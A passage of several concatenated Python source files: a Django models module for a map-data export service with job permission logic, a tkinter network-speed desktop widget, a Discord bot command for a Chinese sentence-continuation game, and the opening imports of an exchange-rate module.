return user_size_rule[0].max_data_size
return self.max_data_size
def get_max_selection_size(self, user=None):
if not user:
return self.max_selection
# the usersizerule set is looped instead of using a queryset filter so that it can be prefetched.
if user:
user_size_rule = list(
filter(lambda user_size_rule: user_size_rule.user == user, self.usersizerule_set.all())
)
if user_size_rule:
return user_size_rule[0].max_selection_size
return self.max_selection
def get_data_type(self) -> str:
"""
This is used to populate the run metadata with special types for OSM and NOME.
This is used for custom cartography,
and should be removed if custom cartography is made configurable.
:param data_provider:
:return:
"""
if self.slug.lower() in ["nome", "osm"]:
return self.slug.lower()
else:
return str(self.data_type)
class DataProviderStatus(UIDMixin, TimeStampedModelMixin):
"""
Model that remembers the last recorded status of a data provider.
"""
status = models.CharField(max_length=10, blank=True)
status_type = models.CharField(max_length=25, blank=True)
message = models.CharField(max_length=150, blank=True)
last_check_time = models.DateTimeField(null=True)
related_provider = models.ForeignKey(DataProvider, on_delete=models.CASCADE, related_name="data_provider_status")
class Meta:
verbose_name_plural = "data provider statuses"
ordering = ["-last_check_time"]
class Region(UIDMixin, TimeStampedModelMixin):
"""
Model for a HOT Export Region.
"""
def __init__(self, *args, **kwargs):
if not args: # Fixture loading happens with args, so don't do this if that.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
kwargs["the_geom_webmercator"] = convert_polygon(kwargs.get("the_geom_webmercator")) or ""
kwargs["the_geog"] = convert_polygon(kwargs.get("the_geog")) or ""
super(Region, self).__init__(*args, **kwargs)
name = models.CharField(max_length=100, db_index=True)
description = models.CharField(max_length=1000, blank=True)
the_geom = models.MultiPolygonField(verbose_name="Geometry", srid=4326, default="")
the_geom_webmercator = models.MultiPolygonField(
verbose_name="Mercator extent for export region", srid=3857, default=""
)
the_geog = models.MultiPolygonField(verbose_name="Geographic extent for export region", geography=True, default="")
properties = models.JSONField(default=dict)
class Meta: # pragma: no cover
managed = True
db_table = "regions"
def __str__(self):
return "{0}".format(self.name)
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
self.the_geog = GEOSGeometry(self.the_geom)
self.the_geom_webmercator = self.the_geom.transform(ct=3857, clone=True)
super(Region, self).save(*args, **kwargs)
class RegionalPolicy(UIDMixin, TimeStampedModelMixin):
name = models.CharField(max_length=255)
region = models.ForeignKey(Region, on_delete=models.CASCADE, related_name="policies")
providers = models.ManyToManyField(DataProvider, related_name="regional_policies")
policies = models.JSONField()
policy_title_text = models.CharField(max_length=255)
policy_header_text = models.TextField(null=True, blank=True)
policy_footer_text = models.TextField(null=True, blank=True)
policy_cancel_text = models.CharField(max_length=255, null=True, blank=True)
policy_cancel_button_text = models.CharField(max_length=255)
justification_options = models.JSONField()
class Meta:
verbose_name_plural = "Regional Policies"
def __str__(self):
return self.name
class RegionalJustification(UIDMixin, TimeStampedModelMixin):
"""
Model that stores regional justification selections made by users.
"""
justification_id = models.IntegerField()
justification_name = models.CharField(max_length=255)
justification_suboption_value = models.TextField(null=True, blank=True)
regional_policy = models.ForeignKey(RegionalPolicy, on_delete=models.CASCADE, related_name="justifications")
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="justification_user")
def __str__(self):
return str(self.uid)
class VisibilityState(Enum):
PRIVATE = "PRIVATE"
PUBLIC = "PUBLIC"
SHARED = "SHARED"
class Job(UIDMixin, TimeStampedModelMixin):
"""
Model for a Job.
"""
# the "choices" setting for the django admin page drop down list requires a type that can be indexed
visibility_choices = []
for value in VisibilityState:
visibility_choices.append((value.value, value.value))
def __init__(self, *args, **kwargs):
if not args: # Fixture loading happens with args, so don't do this if that.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
kwargs["the_geom_webmercator"] = convert_polygon(kwargs.get("the_geom_webmercator")) or ""
kwargs["the_geog"] = convert_polygon(kwargs.get("the_geog")) or ""
super().__init__(*args, **kwargs)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, related_name="owner")
name = models.CharField(max_length=100, db_index=True)
description = models.CharField(max_length=1000, db_index=True)
event = models.CharField(max_length=100, db_index=True, default="", blank=True)
region = models.ForeignKey(Region, null=True, blank=True, on_delete=models.CASCADE)
preset = models.ForeignKey(DatamodelPreset, on_delete=models.CASCADE, null=True, blank=True)
published = models.BooleanField(default=False, db_index=True) # publish export
visibility = models.CharField(max_length=10, choices=visibility_choices, default=VisibilityState.PRIVATE.value)
featured = models.BooleanField(default=False, db_index=True) # datapack is featured
the_geom = models.MultiPolygonField(verbose_name="Extent for export", srid=4326, default="")
the_geom_webmercator = models.MultiPolygonField(verbose_name="Mercator extent for export", srid=3857, default="")
the_geog = models.MultiPolygonField(verbose_name="Geographic extent for export", geography=True, default="")
original_selection = models.GeometryCollectionField(
verbose_name="The original map selection", srid=4326, default=GeometryCollection, null=True, blank=True
)
include_zipfile = models.BooleanField(default=False)
json_tags = models.JSONField(default=dict)
last_export_run = models.ForeignKey(
"tasks.ExportRun", on_delete=models.DO_NOTHING, null=True, related_name="last_export_run"
)
projections = models.ManyToManyField(Projection, related_name="projections")
class Meta: # pragma: no cover
managed = True
db_table = "jobs"
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
self.the_geog = GEOSGeometry(self.the_geom)
self.the_geom_webmercator = self.the_geom.transform(ct=3857, clone=True)
super(Job, self).save(*args, **kwargs)
def __str__(self):
return "{0}".format(self.name)
@property
def overpass_extents(self):
"""
Return the export extents in order required by Overpass API.
"""
extents = GEOSGeometry(self.the_geom).extent # (w,s,e,n)
# overpass needs extents in order (s,w,n,e)
overpass_extents = "{0},{1},{2},{3}".format(str(extents[1]), str(extents[0]), str(extents[3]), str(extents[2]))
return overpass_extents
@property
def extents(self):
return GEOSGeometry(self.the_geom).extent # (w,s,e,n)
@property
def filters(self):
"""
Return key=value pairs for each tag in this export.
Used in utils.overpass.filter to filter the export.
"""
# Command-line key=value filters for osmfilter
filters = []
for tag in self.json_tags:
kv = "{0}={1}".format(tag["key"], tag["value"])
filters.append(kv)
return filters
@property
def categorised_tags(self):
"""
Return tags mapped according to their geometry types.
"""
points = set()
lines = set()
polygons = set()
for tag in self.json_tags:
if "point" in tag["geom"]:
points.add(tag["key"])
if "line" in tag["geom"]:
lines.add(tag["key"])
if "polygon" in tag["geom"]:
polygons.add(tag["key"])
return {
"points": sorted(list(points)),
"lines": sorted(list(lines)),
"polygons": sorted(list(polygons)),
}
@property
def bounds_geojson(self):
return serialize("geojson", [self], geometry_field="the_geom", fields=("name", "the_geom"))
@property
def attribute_classes(self):
providers = [provider_task.provider for provider_task in self.data_provider_tasks.all()]
return AttributeClass.objects.filter(data_providers__in=providers).distinct()
def get_last_run(self):
return self.runs.last()
class DataProviderTask(models.Model):
"""
Model for a set of tasks assigned to a provider for a job.
"""
id = models.AutoField(primary_key=True, editable=False)
uid = models.UUIDField(unique=True, default=uuid.uuid4, editable=False, db_index=True)
provider = models.ForeignKey(DataProvider, on_delete=models.CASCADE, related_name="data_provider")
job = models.ForeignKey(Job, on_delete=models.CASCADE, null=True, related_name="data_provider_tasks")
formats = models.ManyToManyField(ExportFormat, related_name="formats")
min_zoom = models.IntegerField(blank=True, null=True)
max_zoom = models.IntegerField(blank=True, null=True)
def __str__(self):
return "{0} - {1}".format(str(self.uid), self.provider)
class RegionMask(models.Model):
"""
Model to hold region mask.
"""
def __init__(self, *args, **kwargs):
if not args: # Fixture loading happens with args, so don't do this if that.
kwargs["the_geom"] = convert_polygon(kwargs.get("the_geom")) or ""
super().__init__(*args, **kwargs)
id = models.IntegerField(primary_key=True)
the_geom = models.MultiPolygonField(verbose_name="Mask for export regions", srid=4326)
class Meta: # pragma: no cover
managed = False
db_table = "region_mask"
def save(self, *args, **kwargs):
self.the_geom = convert_polygon(self.the_geom)
super(RegionMask, self).save(*args, **kwargs)
class ExportProfile(models.Model):
"""
Model to hold Group export profile.
"""
name = models.CharField(max_length=100, blank=False, default="")
group = models.OneToOneField(Group, on_delete=models.CASCADE, related_name="export_profile")
max_extent = models.IntegerField()
class Meta: # pragma: no cover
managed = True
db_table = "export_profiles"
def __str__(self):
return "{0}".format(self.name)
class UserJobActivity(models.Model):
CREATED = "created"
VIEWED = "viewed"
UPDATED = "updated"
DELETED = "deleted"
user = models.ForeignKey(User, null=True, on_delete=models.CASCADE)
job = models.ForeignKey(Job, null=True, on_delete=models.CASCADE)
type = models.CharField(max_length=100, blank=False)
created_at = models.DateTimeField(default=timezone.now, editable=False)
def __str__(self):
return "%s %s %s %s" % (self.user, self.job, self.type, self.created_at)
def convert_polygon(geom=None):
if geom and isinstance(geom, Polygon):
return MultiPolygon(geom, srid=geom.srid)
return geom
def bbox_to_geojson(bbox=None):
"""
:param bbox: A list [xmin, ymin, xmax, ymax]
:returns: A geojson of the bbox.
"""
bbox = Polygon.from_bbox(bbox)
geometry = json.loads(GEOSGeometry(bbox, srid=4326).geojson)
return {"type": "Feature", "geometry": geometry}
def remove_permissions(model, id):
JobPermission.objects.filter(content_type=ContentType.objects.get_for_model(model), object_id=id).delete()
class JobPermissionLevel(Enum):
NONE = "NONE"
READ = "READ"
ADMIN = "ADMIN"
class JobPermission(TimeStampedModelMixin):
"""
Model associates users or groups with jobs
"""
job = models.ForeignKey(Job, on_delete=models.CASCADE, related_name="permissions")
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField(db_index=True)
content_object = GenericForeignKey("content_type", "object_id")
permission = models.CharField(choices=[("READ", "Read"), ("ADMIN", "Admin")], max_length=10)
# A user should only have one type of permission per job.
class Meta:
db_table = "jobpermission"
constraints = [
models.UniqueConstraint(
fields=["job", "content_type", "object_id", "permission"], name="unique_object_permission_per_job"
),
]
@staticmethod
def get_orderable_queryset_for_job(job: Job, model: Union[Type[User], Type[Group]]) -> QuerySet:
admin: ListOrQuerySet
shared: ListOrQuerySet
unshared: ListOrQuerySet
admin = shared = unshared = []
if job:
job_permissions = job.permissions.prefetch_related("content_object").filter(
content_type=ContentType.objects.get_for_model(model)
)
admin_ids = []
shared_ids = []
for job_permission in job_permissions:
if job_permission.permission == JobPermissionLevel.ADMIN.value:
admin_ids += [job_permission.content_object.id]
else:
shared_ids += [job_permission.content_object.id]
admin_queryset = model.objects.filter(pk__in=admin_ids)
shared_queryset = model.objects.filter(pk__in=shared_ids)
total = admin_ids + shared_ids
unshared_queryset = model.objects.exclude(pk__in=total)
queryset = (
cast(QuerySet, admin_queryset) | cast(QuerySet, shared_queryset) | cast(QuerySet, unshared_queryset)
)
else:
queryset = model.objects.all()
# https://docs.djangoproject.com/en/3.0/ref/models/conditional-expressions/#case
queryset = queryset.annotate(
admin_shared=Case(
When(id__in=admin, then=Value(0)),
When(id__in=shared, then=Value(1)),
When(id__in=unshared, then=Value(2)),
default=Value(2),
output_field=models.IntegerField(),
)
).annotate(
shared=Case(
When(id__in=admin, then=Value(0)),
When(id__in=shared, then=Value(0)),
When(id__in=unshared, then=Value(1)),
default=Value(1),
output_field=models.IntegerField(),
)
)
return queryset
@staticmethod
def jobpermissions(job: Job) -> dict:
permissions: Dict[str, Dict] = {"groups": {}, "members": {}}
for jp in job.permissions.prefetch_related("content_object"):
if isinstance(jp.content_object, User):
permissions["members"][jp.content_object.username] = jp.permission
else:
permissions["groups"][jp.content_object.name] = jp.permission
return permissions
@staticmethod
def userjobs(user, level, include_groups=True):
# super users can do anything to any job
jobs = Job.objects.all()
if user.is_superuser:
return jobs
# Get jobs for groups that the user belongs to
if include_groups:
groups = Group.objects.filter(group_permissions__user=user)
group_query = [
Q(permissions__content_type=ContentType.objects.get_for_model(Group)),
Q(permissions__object_id__in=groups),
]
if level != JobPermissionLevel.READ.value:
group_query.append(Q(permissions__permission=level))
# get all the jobs this user has been explicitly assigned to
user_query = [
Q(permissions__content_type=ContentType.objects.get_for_model(User)),
Q(permissions__object_id=user.id),
]
if level != JobPermissionLevel.READ.value:
user_query.append(Q(permissions__permission=level))
# If not requesting Admin level permission (i.e. to make admin changes), then also include public datasets.
public_query = Q()
if level == JobPermissionLevel.READ.value:
public_query = Q(visibility=VisibilityState.PUBLIC.value)
return jobs.filter(Q(*user_query) | Q(*group_query) | public_query)
@staticmethod
def groupjobs(group, level):
# get all the jobs for which this group has the given permission level
query = [
Q(permissions__content_type=ContentType.objects.get_for_model(Group)),
Q(permissions__object_id=group.id),
]
if level != JobPermissionLevel.READ.value:
query.append(Q(permissions__permission=level))
# If not requesting Admin level permission (i.e. to make admin changes), then also include public datasets.
public_query = Q()
if level == JobPermissionLevel.READ.value:
public_query = Q(visibility=VisibilityState.PUBLIC.value)
return Job.objects.filter(Q(*query) | public_query)
@staticmethod
def get_user_permissions(user, job_uid):
"""
Check what level of permission a user has to a job.
:param user: User obj in question
:param job_uid: Id of the job for which we want the user's permission level
:return: None, READ, or ADMIN depending on what level of permission the user has to the job
"""
permission = None
# All of the permission objects for the job in question.
jps = JobPermission.objects.filter(job__uid=job_uid)
try:
# Check if the user has explicit permissions to the job.
user_permission = jps.get(content_type=ContentType.objects.get_for_model(User), object_id=user.pk)
except JobPermission.DoesNotExist:
user_permission = None
if user_permission:
permission = user_permission.permission
if permission == JobPermissionLevel.ADMIN.value:
# If the users has ADMIN permission we can return.
# If the user does NOT HAVE ADMIN permission we will need to check the groups for implicit ADMIN.
return JobPermissionLevel.ADMIN.value
# Get all the ADMIN level group permissions for the user
users_groups = Group.objects.filter(
group_permissions__user=user, group_permissions__permission=GroupPermissionLevel.ADMIN.value
)
# Check if any of the groups the user is an admin of have group-admin permission to the job.
jp_group_admin = (
jps.filter(content_type=ContentType.objects.get_for_model(Group))
.filter(object_id__in=users_groups)
.filter(permission=JobPermissionLevel.ADMIN.value)
)
# If any of the groups the user is an admin of have admin-group permission
# we know that the user has implicit ADMIN permission to the job.
if jp_group_admin.count() > 0:
return JobPermissionLevel.ADMIN.value
# If the user already has explict READ permissions we can return without checking for implicit READ via groups.
if permission:
return JobPermissionLevel.READ.value
# Get all the group permissions for groups the user is in.
users_groups = Group.objects.filter(group_permissions__user=user)
# Check if any of the groups the user is in have group-read permission to the job.
jp_group_member = (
jps.filter(content_type=ContentType.objects.get_for_model(Group))
.filter(object_id__in=users_groups)
.filter(permission=JobPermissionLevel.READ.value)
)
# If any of the groups the user is in have READ permissions we can return.
if jp_group_member.count() > 0:
return JobPermissionLevel.READ.value
# If user does not have any explicit or implicit permission to the job we return none.
return ""
def __str__(self):
return "{0} - {1}: {2}: {3}".format(self.content_type, self.object_id, self.job, self.permission)
def __unicode__(self):
return "{0} - {1}: {2}: {3}".format(self.content_type, self.object_id, self.job, self.permission)
def delete(self, *args, **kwargs):
for job_permission in JobPermission.objects.filter(object_id=self.pk):
job_permission.content_type = ContentType.objects.get_for_model(User)
job_permission.object_id = job_permission.job.user.pk
job_permission.save()
super(Group, self).delete(*args, **kwargs)
# https://github.com/python/mypy/issues/2427
Group.delete = delete # type: ignore
def load_provider_config(config: Union[str, dict]) -> dict:
"""
Function deserializes a yaml object from a given string.
"""
try:
if isinstance(config, dict):
return copy.deepcopy(config)
configuration = yaml.safe_load(config) if config else dict()
except yaml.YAMLError as e:
logger.error(f"Unable to load provider configuration: {e}")
raise Exception(e)
return configuration
def clean_config(config: Union[str, dict]) -> dict:
"""
Used to remove adhoc service related values from the configuration.
:param config: A yaml structured string.
:return: A yaml as a dict.
"""
service_keys = [
"cert_info",
"cert_cred",
"concurrency",
"max_repeat",
"overpass_query",
"max_data_size",
"pbf_file",
"tile_size",
]
if isinstance(config, str):
conf = yaml.safe_load(config)
else:
conf = copy.deepcopy(config)
for service_key in service_keys:
conf.pop(service_key, None)
return conf
def clean_config_as_str(config: str) -> str:
"""
Used to remove adhoc service related values from the configuration.
:param config: A yaml structured string.
:param return_dict: True if wishing to return config as dictionary.
:return: A yaml as a str.
"""
return yaml.dump(clean_config(config), Dumper=CDumper)
|
netspeed.py
|
import threading
import time
import psutil
from tkinter import Tk,Label,Button,OptionMenu,StringVar,NORMAL,DISABLED,PhotoImage
from tkinter.messagebox import showinfo
import os
import sys
speedUp=None
speedDown=None
bgr='black'
alpha=.9
run=True
interface=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)][0]
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
buttonSelectInterface=None
windowx=0
windowy=0
if(len(interface)==0):
os._exit(0)
if(os.path.exists('C:\\ProgramData\\NetSpeed\\netinterfacedata.log')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','r') as f:
line=str(f.readline()).strip()
interfacelist=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(line in interfacelist):
if(psutil.net_if_stats()[interface].isup):
interface=line
else:
interface=interfacelist[0]
else:
interface=interfacelist[0]
def speedCalc(up,down,timediff=1):
global speedUp,speedDown,run,interface,interface_list_at_startup,buttonSelectInterface
up=0
down=0
while(run):
try:
if(interface in list(dict.keys(psutil.net_if_stats()))):
if(not psutil.net_if_stats()[interface].isup):
interface_list_new=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
previnter=interface
interface=list(set(interface_list_new).difference(interface_list_at_startup))[0] if(len(list(set(interface_list_new).difference(interface_list_at_startup)))>0) else interface
if(previnter!=interface):
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
continue
#on_closing()
else:
interface_list_new=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
previnter=interface
interface=list(set(interface_list_new).difference(interface_list_at_startup))[0] if(len(list(set(interface_list_new).difference(interface_list_at_startup)))>0) else interface
if(previnter!=interface):
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
if(os.path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
continue
sent=psutil.net_io_counters(pernic=True)[interface].bytes_sent
recv=psutil.net_io_counters(pernic=True)[interface].bytes_recv
total=(sent+recv)/1000
unitUp=1
unitDown=1
unitTotal=1
upspeed=(sent-up)/1000
downspeed=(recv-down)/1000
if(len(str(int(upspeed)))>=4):
upspeed=upspeed/1000
unitUp=2
if(len(str(int(downspeed)))>=4):
downspeed=downspeed/1000
unitDown=2
if(len(str(int(total)))>=7):
total=total/1000000
unitTotal=3
elif(len(str(int(total)))>=4):
total=total/1000
unitTotal=2
speedUp.config(text='{0:.2f} {1}/s'.format(upspeed,'KB' if unitUp==1 else 'MB'))
speedDown.config(text='{0:.2f} {1}/s'.format(downspeed,'KB' if unitDown==1 else 'MB'))
totalUsage.config(text='{0:.2f} {1}'.format(total,'KB' if unitTotal==1 else 'MB' if unitTotal==2 else 'GB'))
time.sleep(timediff)
up=sent
down=recv
except Exception as e:
pass
def resource_path(relative_path):
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
def getnetinterface():
global buttonSelectInterface,interface,bgr,windowx,windowy,interface_list_at_startup
w=175
h=30
x = windowx
y = windowy
if(x<0 or y<0):
x,y=0,0
netinterface = Tk()
netinterface.title("Select Network Interface")
netinterface.geometry('%dx%d+%d+%d' % (w, h, x, y))
netinterface.wm_attributes('-alpha',alpha)
netinterface.wm_attributes('-topmost', 1)
var = StringVar(netinterface)
var.set("Select Network Interface")
def grab_and_assign(event):
global buttonSelectInterface,interface,bgr,interface_list_at_startup
chosen_option = var.get()
interface=chosen_option
if(os.path.exists('C:\\ProgramData\\NetSpeed')):
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
else:
os.mkdir('C:\\ProgramData\\NetSpeed')
with open('C:\\ProgramData\\NetSpeed\\netinterfacedata.log','w+') as f:
f.write(interface)
buttonSelectInterface.config(text=interface[0])
interface_list_at_startup=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
netinterface.destroy()
lst=[itf for itf in list(dict.keys(psutil.net_if_stats())) if(psutil.net_if_stats()[itf].isup)]
drop_menu = OptionMenu(netinterface, var,*lst, command=grab_and_assign)
drop_menu.config(bg=bgr,fg='white')
drop_menu.grid(row=0, column=0)
netinterface.resizable(0, 0)
netinterface.overrideredirect(1)
netinterface.configure(background=bgr)
netinterface.mainloop()
app=Tk()
xpos,ypos=0,0
butBool=False
totalBool=False
upBool=False
downBool=False
downiconBool=False
totaliconbool=False
interfacebuttonbool=False
infobuttonbool=False
def on_closing():
global app,run
run=False
app.destroy()
os._exit(0)
def move_window(event):
global xpos,ypos,butBool,totalBool,upBool,downBool,downiconBool,totaliconbool,windowx,windowy,interfacebuttonbool,infobuttonbool
if(not butBool and not interfacebuttonbool and not infobuttonbool):
if(totalBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos-50}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos-50
elif(totaliconbool):
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos-50}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos-50
elif(upBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos
elif(downBool):
app.geometry(f'+{event.x_root-xpos-27}+{event.y_root-ypos-25}')
windowx=event.x_root-xpos-27
windowy=event.y_root-ypos-25
elif(downiconBool):
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos-25}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos-25
else:
app.geometry(f'+{event.x_root-xpos}+{event.y_root-ypos}')
windowx=event.x_root-xpos
windowy=event.y_root-ypos
butBool=False
totalBool=False
upBool=False
downBool=False
downiconBool=False
totaliconbool=False
interfacebuttonbool=False
infobuttonbool=False
def showInfo():
showinfo('Info', 'The interface selected is: \n\"'+interface+'\"\n\nIf you want to change the interface, click on the letter which is below the close button')
def getorigin(eventorigin):
global xpos,ypos
xpos = eventorigin.x
ypos = eventorigin.y
def buttonmotion(event):
global butBool
butBool=True
def totalUsagemotion(event):
global totalBool
totalBool=True
def speedUpmotion(event):
global upBool
upBool=True
def speedDownmotion(event):
global downBool
downBool=True
def speedDowniconmotion(event):
global downiconBool
downiconBool=True
def totaliconmotion(event):
global totaliconbool
totaliconbool=True
def interfacebuttonmotion(event):
global interfacebuttonbool
interfacebuttonbool=True
def infomotion(event):
global infobuttonbool
infobuttonbool=True
# change the transperancy when mouse is scrolled
def scrollmouse(event):
global alpha
if(event.delta<0):
if(alpha>.15):
alpha=alpha-.05
app.wm_attributes('-alpha',alpha)
else:
if(alpha<1.0):
alpha=alpha+.05
app.wm_attributes('-alpha',alpha)
#close window
def exitNetspeed():
global app,run
run=False
app.destroy()
os._exit(0)
app.title('Net Speed')
w=160
h=76
# get screen width and height
ws = app.winfo_screenwidth() # width of the screen
hs = app.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Tk root window
x = ws-w
y = hs-116
windowx=x
windowy=y
app.geometry('%dx%d+%d+%d' % (w, h, x, y))
app.wm_attributes('-alpha',alpha)
app.wm_attributes('-topmost', 1)
uppath = resource_path("up.png")
photo = PhotoImage(file = uppath)
mpUp = photo.subsample(6, 6)
downpath= resource_path("down.png")
photo = PhotoImage(file = downpath)
mpDown = photo.subsample(6, 6)
totalpath= resource_path("updown.png")
photo = PhotoImage(file = totalpath)
mpTotal = photo.subsample(24, 24)
closepath= resource_path("close.png")
photo = PhotoImage(file = closepath)
buttonimg = photo.subsample(11, 11)
infopath= resource_path("info.png")
photo = PhotoImage(file = infopath)
infoimg = photo.subsample(14, 14)
iconUp = Label(app ,text = "Up:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpUp)
iconUp.grid(row = 0,column = 0)
iconDown = Label(app ,text = "Down:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpDown)
iconDown.grid(row = 1,column = 0)
speedUp = Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
speedUp.grid(row = 0,column = 1)
speedDown = Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
speedDown.grid(row = 1,column = 1)
iconTotal = Label(app ,text = "Total:",background=bgr,foreground='white',font='Helvetica 11 bold',image=mpTotal)
iconTotal.grid(row = 2,column = 0)
totalUsage= Label(app ,text = "0",background=bgr,foreground='white',font='Helvetica 11 bold')
totalUsage.grid(row = 2,column = 1)
buttonClose = Button(app, image=buttonimg,background=bgr,borderwidth=0,command =exitNetspeed,state=DISABLED)
buttonClose.place(x=w-28, y=0)
buttonSelectInterface = Button(app, text=interface[0],borderwidth=0,background=bgr,foreground='white',command =getnetinterface,font='Helvetica 10 bold')
buttonSelectInterface.place(x=w-26, y=26)
info = Button(app, image=infoimg,background=bgr,borderwidth=0,command =showInfo)
info.place(x=w-25, y=54)
app.resizable(0, 0)
app.overrideredirect(1)
app.configure(background=bgr)
app.bind("<Enter>", lambda event: buttonClose.config(state=NORMAL))
app.bind("<Leave>", lambda event: buttonClose.config(state=DISABLED))
# to move the window even when dragging is done by clicking the icons
buttonClose.bind("<B1-Motion>", buttonmotion)
speedUp.bind("<B1-Motion>", speedUpmotion)
speedDown.bind("<B1-Motion>", speedDownmotion)
totalUsage.bind("<B1-Motion>", totalUsagemotion)
iconDown.bind("<B1-Motion>", speedDowniconmotion)
iconTotal.bind("<B1-Motion>", totaliconmotion)
buttonSelectInterface.bind("<B1-Motion>", interfacebuttonmotion)
info.bind("<B1-Motion>", infomotion)
app.bind("<Button 1>",getorigin)
app.bind("<B1-Motion>", move_window)
app.bind("<MouseWheel>", scrollmouse)
app.protocol("WM_DELETE_WINDOW", on_closing)
upspeed=(psutil.net_io_counters(pernic=True)[interface].bytes_sent)/1000
downspeed=(psutil.net_io_counters(pernic=True)[interface].bytes_recv)/1000
time.sleep(1)
t = threading.Thread(target=speedCalc, args=(upspeed,downspeed,))
t.daemon = True
t.start()
app.mainloop()
|
chat_command.py
|
import threading
from collections import deque
from discord_bot.commands.base_command import BaseCommand
from generation.sanitization import *
class ChatCommand(BaseCommand):
"""
A simple chat bot that responds to messages in a designated channel
"""
COMMAND_OPTION = 'chat'
def __init__(self, client, config, model):
"""
:param client: discord client
:param config: configparser
:param model: generation model
"""
self.client = client
self.model = model
self.config = config[self.COMMAND_OPTION]
self.max_length = int(self.config['max_length'])
self.min_length = int(self.config['min_length'])
self.model_version = self.config['model_version']
channel_ids_str = self.config['channel_ids']
# channel ids are integers
self.allowed_channel_ids = [int(s) for s in channel_ids_str.split(',')]
# fix length queue to track the chat history
self.queue = deque([], maxlen=10)
def get_command_prefix(self):
return self.COMMAND_PREFIX + ' ' + self.COMMAND_OPTION
def get_help_message(self):
return '接龙游戏'
def execute(self, original_message):
"""
execute generation
:param original_message: discord message object
:return:
"""
thread = threading.Thread(target=self.generate, args=(original_message,))
thread.start()
def get_allowed_channel_ids(self):
return self.allowed_channel_ids
def generate(self, original_message):
# restart a new session
if 'restart' == original_message.content:
self.client.loop.create_task(original_message.channel.send('restarted'))
self.queue = deque([], maxlen=10)
return
# rewrite the last generation
elif 'rewrite' == original_message.content:
self.client.loop.create_task(original_message.channel.send('rewriting...'))
# remove the last generation from the queue
self.queue.pop()
else:
message = self.get_prefix(original_message)
message = message.strip()
message = self.sanitize(message)
message = self.finish_sentence_with_punctuation(message)
# if user input is too long or too short
if len(message) > self.max_length:
self.client.loop.create_task(original_message.channel.send('不能超过800字'))
return
if len(message) < self.min_length:
self.client.loop.create_task(original_message.channel.send('要10个字以上'))
return
# queue the message
self.queue.append(message)
# concatenate all the previously queued message
history = ''.join(self.queue)
# generation logic
generated = self.model.generate(history)
generated = self.remove_incomplete_sentence(generated)
# queue the generated message
self.queue.append(generated)
# send result back
self.client.loop.create_task(original_message.channel.send(generated))
def finish_sentence_with_punctuation(self, sentence):
"""
add period to the end of the sentence
:param sentence:
:return:
"""
punctuation = ['。', '!', '?', '!', '?']
has_tailing_punctuation = list(filter(sentence.endswith, punctuation)) != []
# if a valid punctuation is missing at the end of the sentence
if not has_tailing_punctuation:
sentence = sentence + '。'
return sentence
def remove_incomplete_sentence(self, sentence):
"""
remove the dangling/incomplete part from the end of the sentence
e.g. 夜正长,路也正长,我们忘却了 ==> 夜正长,路也正长,
:param sentence:
:return:
"""
punctuation = ['。', ',', '!', '?', ',', '!', '?']
# tracks the position of the last punctuation
last_punctuation = len(sentence)
for i in range(0, len(sentence)):
if sentence[i] in punctuation:
last_punctuation = i
return sentence[0:last_punctuation + 1]
def get_prefix(self, original_message):
return original_message.content.replace(self.get_command_prefix(), '')
def sanitize(self, prefix):
prefix = ''.join(prefix.split())
prefix = prefix.lower()
# sanitize prefix
prefix = remove_discord_emojis(prefix)
prefix = unescape_html(prefix)
prefix = remove_special_characters(prefix)
prefix = remove_html_xml_tags(prefix)
prefix = remove_urls(prefix)
prefix = convert_and_remove_punctuation(prefix)
prefix = remove_nonchinese_characters(prefix)
return prefix
|
exchange_rate.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from datetime import datetime
import inspect
import requests
import sys
